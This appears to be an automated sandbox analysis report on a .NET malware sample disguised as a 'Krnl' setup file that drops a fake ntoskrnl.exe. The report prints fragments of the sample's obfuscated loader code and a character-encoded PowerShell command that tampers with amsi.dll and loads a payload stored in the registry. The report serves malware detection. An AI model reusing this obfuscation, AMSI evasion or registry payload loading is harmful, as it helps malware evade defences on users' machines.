                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\lsass.exeSection loaded: ngcpopkeysrv.dll
                              Source: C:\Windows\System32\lsass.exeSection loaded: devobj.dll
                              Source: C:\Windows\System32\lsass.exeSection loaded: pcpksp.dll
                              Source: C:\Windows\System32\lsass.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\lsass.exeSection loaded: tbs.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                              Source: ntoskrnl.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\ntoskrnl.exe
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: RdLfpZY5A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: RdLfpZY5A9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ~1.PDB @7_9)ux source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              .NET source code contains potential unpacker
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: ShBTJDYV4jRo7REWRW7Cr1jYv6C5FA7f2OU1EMoMQMNXmaxVLJoZvNOhSNYTOw3LCpoBLUvIGoswxzbB2QF4wbF77nAr7u System.AppDomain.Load(byte[])
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux System.AppDomain.Load(byte[])
                              Source: ntoskrnl.exe.3.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs.Net Code: uNfoNI7Y4g6Dxv7WXOdS8LNPdcLqcF2mkaux
                              Found suspicious powershell code related to unpacking or dynamic code loading
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($lUrimOjxLHSAgu,$qnwSIaibfbWlFcLLMVH).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.dll');$rLMnIHfZQPDuCMOEo=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$kIpEHaJ,[Object](''+[
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Ch
                              Obfuscated command line found
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=
                              Suspicious powershell command line found
